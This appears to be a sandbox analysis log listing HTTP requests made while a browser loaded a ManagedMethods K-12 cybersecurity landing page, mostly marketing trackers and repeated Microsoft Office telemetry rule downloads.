Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=179553754383&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive&cpi=179553754383&lpi=179553754383&lvi=179553754383&lvc=en&r=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&pu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&t=Automating+Cybersecurity+%26+Student+Safety+with+ManagedMethods&cts=1728897174109&vi=1ad7ee3b723d214336417ad5b634063c&nc=true&ce=false&pt=1&cc=0 HTTP/1.1Host: track.hubspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /hubfs/mm-favicon_color.png HTTP/1.1Host: get.managedmethods.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=aV9eh48TbcmnzLUYaOGyl9ZxmcHu3.V6rr.LoK14jSw-1728897165-1.0.1.1-V.ghB.sc2Sxqv_orrUJY1bMt9n3SmHmZy_fSqA2PFfzQBrUcPPhTOnOL1Gi.2oztVEzrDAy5uONJq6UwmEF.Xw; __cfruid=5b70ce25a88be886670aaabc12053a6a40a131b0-1728897165; _hjSessionUser_1110137=eyJpZCI6ImFjOTM4NjhkLTRlMzAtNTQzZi1hN2Y0LWY5ODFkYzA1MTIyZCIsImNyZWF0ZWQiOjE3Mjg4OTcxNzIyMzUsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_1110137=eyJpZCI6IjYyMDI2NzdmLTg3MTctNDRkZC04ODhlLTA3Zjk4MWRjNmM3ZSIsImMiOjE3Mjg4OTcxNzIyMzYsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MH0=
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /api/v2/client/ws?v=7&site_id=1110137 HTTP/1.1Host: ws.hotjar.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://get.managedmethods.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: n2hLj8KItmIRBdsSW5LgvA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /lead-flows-config/v1/config/json?portalId=6834707&referrer=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&contentId=179553754383&currentUrl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5 HTTP/1.1Host: forms.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cookie-banner-public/v1/cf-location HTTP/1.1Host: js.hs-banner.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=28&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=179553754383&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive&cpi=179553754383&lpi=179553754383&lvi=179553754383&lvc=en&r=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&pu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&t=Automating+Cybersecurity+%26+Student+Safety+with+ManagedMethods&cts=1728897182588&vi=1ad7ee3b723d214336417ad5b634063c&nc=true&u=82022089.1ad7ee3b723d214336417ad5b634063c.1728897174105.1728897174105.1728897174105.1&b=82022089.1.1728897174106&pt=1&cc=15 HTTP/1.1Host: track.hubspot.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=6834707 HTTP/1.1Host: api.hubapi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://get.managedmethods.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/v2/client/ws?v=7&site_id=1110137 HTTP/1.1Host: ws.hotjar.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://get.managedmethods.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: nC61wU+wxkMOeaiPrqV0Rw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /j/roundtrip.js HTTP/1.1Host: s.adroll.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /lead-flows-config/v1/config/json?portalId=6834707&referrer=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&contentId=179553754383&currentUrl=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5 HTTP/1.1Host: forms.hubspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cookie-banner-public/v1/cf-location HTTP/1.1Host: js.hs-banner.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__ptq.gif?k=28&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=471034161&v=1.1&a=6834707&pi=179553754383&ct=landing-page&ccu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive&cpi=179553754383&lpi=179553754383&lvi=179553754383&lvc=en&r=https%3A%2F%2Fgoogleads.g.doubleclick.net%2F&pu=https%3A%2F%2Fget.managedmethods.com%2Fk12-cybersecurity-safety-k12dive%3Fgad_source%3D5&t=Automating+Cybersecurity+%26+Student+Safety+with+ManagedMethods&cts=1728897182588&vi=1ad7ee3b723d214336417ad5b634063c&nc=true&u=82022089.1ad7ee3b723d214336417ad5b634063c.1728897174105.1728897174105.1728897174105.1&b=82022089.1.1728897174106&pt=1&cc=15 HTTP/1.1Host: track.hubspot.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=xkjhMTjfrF_0mXBzGhE8IiLuUDkZrnYNnngA9kzj3ak-1728897171-1.0.1.1-sPy.uw12TWgWjkjYaW6.Egck_g3_FMWXbUkiladlPRQXQ6lTAIpxK0P16wgrfdqlfCyKMoR0rbfNmkWJwLKA3g; _cfuvid=Ae66Nhk1VZK7uX1XY9LsH1X7gJTL.3T07YHHUeTQsUU-1728897171836-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /hs-script-loader-public/v1/config/pixels-and-events/json?portalId=6834707 HTTP/1.1Host: api.hubapi.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6834707.js HTTP/1.1Host: js.hs-scripts.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
